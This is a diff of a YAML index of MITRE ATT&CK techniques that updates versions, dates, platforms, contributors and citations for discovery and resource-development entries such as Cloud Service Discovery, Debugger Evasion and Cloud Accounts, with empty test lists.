+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -50750,10 +51437,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -50762,15 +51451,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -50798,9 +51488,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -50875,7 +51562,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -50947,7 +51633,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -50996,12 +51681,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51022,12 +51706,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51052,7 +51735,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51107,7 +51789,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51127,7 +51809,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51230,13 +51911,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51247,7 +51927,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51318,29 +51998,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -51364,15 +52043,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51404,17 +52086,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51467,11 +52148,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51507,7 +52187,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -51556,43 +52236,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -51605,18 +52254,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -51638,7 +52318,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -51654,8 +52334,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -51677,7 +52355,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51697,8 +52375,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -51737,7 +52413,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51758,8 +52434,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -51789,7 +52463,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -51826,8 +52500,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -51849,7 +52521,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -51871,8 +52543,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -51909,7 +52579,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -51931,8 +52601,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -51994,7 +52662,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52016,7 +52683,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52034,8 +52701,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52070,7 +52735,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52089,33 +52754,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52125,10 +52788,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
